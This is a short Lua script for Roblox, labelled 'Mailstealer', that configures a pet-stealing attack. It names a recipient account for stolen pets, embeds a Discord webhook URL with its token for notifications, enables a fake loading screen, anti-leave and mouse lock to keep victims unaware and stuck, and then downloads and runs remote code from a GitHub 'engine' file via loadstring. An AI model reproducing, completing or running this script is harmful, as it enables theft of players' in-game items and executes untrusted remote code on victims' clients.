lua
--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "Proabody6" -- good pets
Webhook = "https://discord.com/api/webhooks/1278761825831485514/uaguje-sfrcY-QSBhS8g8CMmuoOnZvQZl__IfWWeb_lLkyBXIVIn9EwZbpEe7C9uxsqd" -- pings for pets
UserName2 = "2nd UserName Here" -- bad pets

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/Egorikusa/Mailstealer/main/engine"))()
